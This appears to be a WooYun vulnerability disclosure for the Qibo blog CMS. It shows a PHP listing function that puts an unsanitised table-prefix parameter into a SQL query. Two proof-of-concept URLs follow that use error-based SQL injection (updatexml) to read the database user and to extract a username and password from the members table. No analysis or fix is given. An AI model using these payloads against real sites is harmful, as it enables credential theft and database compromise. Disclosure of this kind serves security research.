WooYun.org

function get_listbbs($rows){
	global $db,$uid,$TB_pre,$Mrows,$page,$Morder,$Mdesc,$webdb,$VlogCfg;
	$VlogCfg[content_leng]==0 && $VlogCfg[content_leng]=120;
	if($page<1){
		$page=1;
	}
	$min=($page-1)*$rows;
	$albumid && $SQL=" AND albumid='$albumid' ";
	$Mdesc[listbbs] || $Mdesc[listbbs]='DESC';
	$Morder[listbbs] || $Morder[listbbs]="tid";
	$query = $db->query("SELECT T.*,C.* FROM {$TB_pre}threads T LEFT JOIN {$TB_pre}tmsgs C ON T.tid=C.tid WHERE T.authorid='$uid' ORDER BY T.$Morder[listbbs] $Mdesc[listbbs] LIMIT $min,$rows");
	while($rs = $db->fetch_array($query)){
		$rs[postdate]=date("Y-m-d H:i",$rs[postdate]);
		if($VlogCfg[content_leng]>0){
			$rs[content]=@preg_replace('/<([^>]*)>/is',"",$rs[content]);	//把HTML代码过滤掉
			$rs[content]=get_word($rs[content],$VlogCfg[content_leng]);
		}else{
			$rs[content]='';
		}
		$listdb[]=$rs;
	}
	return $listdb;
}

http://127.0.0.1/qibo_blog/blog/index.php?file=listbbs&uid=1&id=1&TB_pre=qb_module where 1=1 or updatexml(2,concat(0x7e,(user())),0) %23

http://127.0.0.1/qibo_blog/blog/index.php?file=listbbs&uid=1'&id=1&TB_pre=qb_module where 1=1 or updatexml(2,concat(0x7e,((select concat(username,0x5c,password) from qb_members limit 0,1))),0) %23